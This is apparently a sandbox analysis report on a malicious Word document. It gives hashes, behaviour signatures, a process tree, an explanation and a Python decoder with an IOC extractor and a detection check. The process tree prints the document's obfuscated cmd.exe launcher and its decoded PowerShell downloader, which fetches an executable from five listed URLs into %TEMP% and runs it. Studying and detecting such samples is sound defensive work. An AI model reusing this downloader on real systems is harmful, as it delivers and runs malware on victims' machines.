Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/04/2024, 21:24

General

  • Target

    001b4dfcbb02bb0ab988a7c35a3a9ff5_JaffaCakes118.doc

  • Size

    132KB

  • MD5

    001b4dfcbb02bb0ab988a7c35a3a9ff5

  • SHA1

    0d6f5812058e8145db07aeea9e669b1c66982acb

  • SHA256

    7102877d70ad54f07bdb5baa4c9a995962b6c7b93b10455b1c118a40954dcd22

  • SHA512

    a0e6404e531d102c510e0177a487fc8e914040dd69d0becfc9ef2bb74d117c998762dfa703fe90356b66b7c6ef9477967fe85f82eb9742d300ca8cd36a3c5e89

  • SSDEEP

    1536:DLh81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadnf+aSzdgY7JM8E2LxUkB:58GhDS0o9zTGOZD6EbzCd+JM8X1B

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\001b4dfcbb02bb0ab988a7c35a3a9ff5_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1500
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2584
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /V/C"set 1Rh=;'jTt'=Zwo$}}{hctac}};kaerb;'KfJ'=wqV$;nsH$ metI-ekovnI{ )00008 eg- htgnel.)nsH$ metI-teG(( fI;'SXV'=GMB$;)nsH$ ,MvR$(eliFdaolnwoD.Bkp${yrt{)WlV$ ni MvR$(hcaerof;'exe.'+PVH$+'\'+pmet:vne$=nsH$;'DAH'=cWc$;'948' = PVH$;'zaa'=jsr$;)'@'(tilpS.'l1sYnNBwe/se.sedenepoitsegoncet//:ptth@ASMYmjN/moc.tluabmarelc-engapmahc.tenartni//:ptth@wQDqEp4zB/if.notirt//:ptth@tgf3utuF/moc.aiillemac//:ptth@9A2UEUgye/moc.grenut//:ptth'=WlV$;tneilCbeW.teN tcejbo-wen=Bkp$;'uKf'=Msc$ llehsrewop&&for /L %n in (470;-1;0)do set jy=!jy!!1Rh:~%n,1!&&if %n lss 1 echo !jy:*jy!=! |powershell -"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2668
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo powershell $csM='fKu';$pkB=new-object Net.WebClient;$VlW='http://tunerg.com/eygUEU2A9@http://camelliia.com/Futu3fgt@http://triton.fi/Bz4pEqDQw@http://intranet.champagne-clerambault.com/NjmYMSA@http://tecnogestiopenedes.es/ewBNnYs1l'.Split('@');$rsj='aaz';$HVP = '849';$cWc='HAD';$Hsn=$env:temp+'\'+$HVP+'.exe';foreach($RvM in $VlW){try{$pkB.DownloadFile($RvM, $Hsn);$BMG='VXS';If ((Get-Item $Hsn).length -ge 80000) {Invoke-Item $Hsn;$Vqw='JfK';break;}}catch{}}$owZ='tTj'; "
          3⤵
            PID:2664
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -
            3⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2396
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =fKu
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2448
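The cmd.exe line recorded for PID 2668 is a string reverser. `set 1Rh=` stores the PowerShell text backwards, `for /L %n in (470;-1;0)` walks the offsets from 470 down to 0 and appends `!1Rh:~%n,1!` (the single character at offset n) to `jy`, and `echo !jy:*jy!=! |powershell -` pipes the result into a PowerShell that reads its script from standard input. The `!jy:*jy!=!` expansion is a substitution whose search string never occurs in the value, so it is effectively a no-op that echoes the whole reversed text; the line echoed by PID 2664 confirms that. The reversed value is exactly 471 characters, so the loop bound was sized to the string. The decoded script tries five URLs in order, keeps the first response of at least 80000 bytes (a gate against short error pages) as %TEMP%\849.exe and runs it with Invoke-Item. Because the decoded text itself begins with the word `powershell`, the stdin-reading instance (PID 2396, the one flagged for network requests) first starts a second powershell.exe whose only argument is `$csM='fKu'` with the undefined variable expanded away; that is the `=fKu` child recorded as PID 2448.

The script below is an added example, not part of the sandbox report and not the sample's own code. It emulates the `for /L` loop on the command line copied from the tree (embedded as constructed input), extracts the indicators from the decoded downloader, and adds a hypothetical process-creation check in the spirit of the "Process spawned unexpected child process" signature. Rendering `$env:temp` as `%TEMP%`, the function names and the regular expressions are this example's own choices.

```python
"""Decode the reversed-string cmd.exe launcher from the process tree and pull its IOCs.

Added example for this report; not sandbox output and not the sample's own code.
The only input is the cmd.exe command line recorded for PID 2668, copied from the
tree into the constant below.
"""
import re
from urllib.parse import urlparse

# Constructed input: the command line of the cmd.exe child of WINWORD.EXE, as recorded.
CMDLINE = r'''"C:\Windows\system32\cmd.exe" /V/C"set 1Rh=;'jTt'=Zwo$}}{hctac}};kaerb;'KfJ'=wqV$;nsH$ metI-ekovnI{ )00008 eg- htgnel.)nsH$ metI-teG(( fI;'SXV'=GMB$;)nsH$ ,MvR$(eliFdaolnwoD.Bkp${yrt{)WlV$ ni MvR$(hcaerof;'exe.'+PVH$+'\'+pmet:vne$=nsH$;'DAH'=cWc$;'948' = PVH$;'zaa'=jsr$;)'@'(tilpS.'l1sYnNBwe/se.sedenepoitsegoncet//:ptth@ASMYmjN/moc.tluabmarelc-engapmahc.tenartni//:ptth@wQDqEp4zB/if.notirt//:ptth@tgf3utuF/moc.aiillemac//:ptth@9A2UEUgye/moc.grenut//:ptth'=WlV$;tneilCbeW.teN tcejbo-wen=Bkp$;'uKf'=Msc$ llehsrewop&&for /L %n in (470;-1;0)do set jy=!jy!!1Rh:~%n,1!&&if %n lss 1 echo !jy:*jy!=! |powershell -"'''

# `set VAR=<value>` up to the next command separator, and the
# `for /L %n in (start;step;end) do set ACC=!ACC!!VAR:~%n,1!` reverser loop.
SET_RE = re.compile(r'set\s+(\w+)=(.*?)&&', re.S)
FOR_RE = re.compile(
    r'for /L %(\w+) in \((-?\d+)[;,](-?\d+)[;,](-?\d+)\)\s*do set (\w+)=!\5!!(\w+):~%\1,1!',
    re.I)


def cmd_substring_loop(value, start, step, end):
    """Emulate the for /L loop: for /L bounds are inclusive, and cmd's !var:~n,1!
    expands to '' when n lies beyond the end of the value.  Negative offsets
    (counting from the end) are not used by this launcher and are not modelled."""
    stop = end + (1 if step > 0 else -1)
    return ''.join(value[n] for n in range(start, stop, step) if 0 <= n < len(value))


def decode_launcher(cmdline):
    """Return the text that reaches `powershell -` on standard input."""
    m_set, m_for = SET_RE.search(cmdline), FOR_RE.search(cmdline)
    if not (m_set and m_for):
        raise ValueError('not a set/for-L string-reverser launcher')
    var, payload = m_set.groups()
    _counter, start, step, end, _acc, src = m_for.groups()
    if src.lower() != var.lower():
        raise ValueError(f'loop reads {src!r} but set defines {var!r}')
    # The trailing `echo !jy:*jy!=!` is a substitution whose search string does not
    # occur in the value, so it echoes the accumulated text unchanged.
    return cmd_substring_loop(payload, int(start), int(step), int(end))


LITERAL_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")   # $name='literal' assignments
TOKEN_RE = re.compile(r"\$env:temp|\$\w+|'[^']*'")     # pieces of a '+' concatenation


def extract_iocs(script):
    """Pull URLs, drop path, size gate and launch verb out of the decoded downloader."""
    literals = dict(LITERAL_RE.findall(script))
    m = re.search(r"'([^']*)'\.Split\('@'\)", script)
    urls = m.group(1).split('@') if m else []
    # $Hsn=$env:temp+'\'+$HVP+'.exe' : resolve the concatenation with the literals
    # collected above; $env:temp is rendered as %TEMP% (this example's convention).
    path = ''
    m = re.search(r"\$\w+=(\$env:temp[^;]*);", script)
    for tok in (TOKEN_RE.findall(m.group(1)) if m else []):
        if tok == '$env:temp':
            path += '%TEMP%'
        elif tok.startswith("'"):
            path += tok[1:-1]
        else:
            path += literals.get(tok[1:], '')
    m = re.search(r'\.length\s+-ge\s+(\d+)', script)
    return {
        'urls': urls,
        'hosts': [urlparse(u).hostname for u in urls],
        'drop_path': path,
        'min_size': int(m.group(1)) if m else None,  # bytes; rejects short error pages
        'launch': 'Invoke-Item' if 'Invoke-Item' in script else None,
    }


OFFICE_IMAGES = {'winword.exe', 'excel.exe', 'powerpnt.exe'}


def office_spawned_reverser(parent_image, child_image, child_cmdline):
    """Hypothetical process-creation check in the spirit of the report's
    'Process spawned unexpected child process' signature: an Office parent starting
    cmd.exe with delayed expansion (/V) and a for /L substring loop."""
    parent = parent_image.rsplit('\\', 1)[-1].lower()
    child = child_image.rsplit('\\', 1)[-1].lower()
    return (parent in OFFICE_IMAGES and child == 'cmd.exe'
            and re.search(r'/V\b', child_cmdline, re.I) is not None
            and FOR_RE.search(child_cmdline) is not None)


if __name__ == '__main__':
    decoded = decode_launcher(CMDLINE)
    print(decoded)
    for key, value in extract_iocs(decoded).items():
        print(f'{key}: {value}')
```

Running it prints the same PowerShell the tree shows being echoed by PID 2664, followed by the five URLs, their hosts, the drop path %TEMP%\849.exe, the 80000-byte gate and the Invoke-Item launch. The hosts are the block and hunt list; note that the Network section of this report is empty, so whether any of the five URLs served a payload during this run is not shown, and the absence of a dropped 849.exe in Downloads is consistent with no download of at least 80000 bytes having completed.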

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

    Filesize

    20KB

    MD5

    c80d7d559b4d055762915aac358d0495

    SHA1

    90f1761855fed7442b8a98bc8417468c1ecf2605

    SHA256

    243bec00aaa7e4acbfc3c38bc963a1ab3d7192ee6bb9b457afeba776ca3131d8

    SHA512

    489ba54312d0c281e1b74969b8f79707d55592243e36e044808409481a7a78bffa1bf0922ad05dd9abca98f145e6a55c982154c73bf20b1584556f38a3da03f8

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    3ad879cc0d04cccf3a444a779f1a863d

    SHA1

    bc03bd3cfc2844f1eabc91f8de3b2e0aa6dfca10

    SHA256

    0135896431bb47bdd1f734233ac7905af4c13eeb10b9f63df9f371f1f3e50eec

    SHA512

    2bfa062a3c806e987545ebc7f513572ace1d52c1489c5c8e281b76e493d1ffaf973531dda6679272a803c98123fae6bf9c560f045e3b2ed0ef7f16178b4dff87

  • memory/1500-31-0x00000000719ED000-0x00000000719F8000-memory.dmp

    Filesize

    44KB

  • memory/1500-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1500-2-0x00000000719ED000-0x00000000719F8000-memory.dmp

    Filesize

    44KB

  • memory/1500-6-0x0000000000510000-0x0000000000610000-memory.dmp

    Filesize

    1024KB

  • memory/1500-7-0x0000000000510000-0x0000000000610000-memory.dmp

    Filesize

    1024KB

  • memory/1500-8-0x0000000000510000-0x0000000000610000-memory.dmp

    Filesize

    1024KB

  • memory/1500-48-0x00000000719ED000-0x00000000719F8000-memory.dmp

    Filesize

    44KB

  • memory/1500-47-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1500-0-0x000000002F311000-0x000000002F312000-memory.dmp

    Filesize

    4KB

  • memory/1500-32-0x0000000000510000-0x0000000000610000-memory.dmp

    Filesize

    1024KB

  • memory/2396-18-0x0000000002880000-0x00000000028C0000-memory.dmp

    Filesize

    256KB

  • memory/2396-30-0x000000006AAB0000-0x000000006B05B000-memory.dmp

    Filesize

    5.7MB

  • memory/2396-17-0x000000006AAB0000-0x000000006B05B000-memory.dmp

    Filesize

    5.7MB

  • memory/2396-16-0x000000006AAB0000-0x000000006B05B000-memory.dmp

    Filesize

    5.7MB

  • memory/2448-26-0x000000006AAB0000-0x000000006B05B000-memory.dmp

    Filesize

    5.7MB

  • memory/2448-25-0x000000006AAB0000-0x000000006B05B000-memory.dmp

    Filesize

    5.7MB

  • memory/2448-24-0x000000006AAB0000-0x000000006B05B000-memory.dmp

    Filesize

    5.7MB